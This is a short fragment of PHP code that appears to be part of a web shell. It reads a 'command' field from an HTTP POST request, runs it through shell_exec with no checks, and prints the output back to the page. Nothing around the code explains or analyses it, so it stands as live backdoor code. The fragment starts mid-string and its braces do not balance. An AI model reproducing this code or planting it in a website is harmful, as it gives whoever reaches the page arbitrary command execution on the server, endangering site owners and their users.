"; if(function_exists('shell_exec')) { $command=$_POST['command']; $output = shell_exec("$command"); echo "
$output
"; } } else { echo "
"; } ?>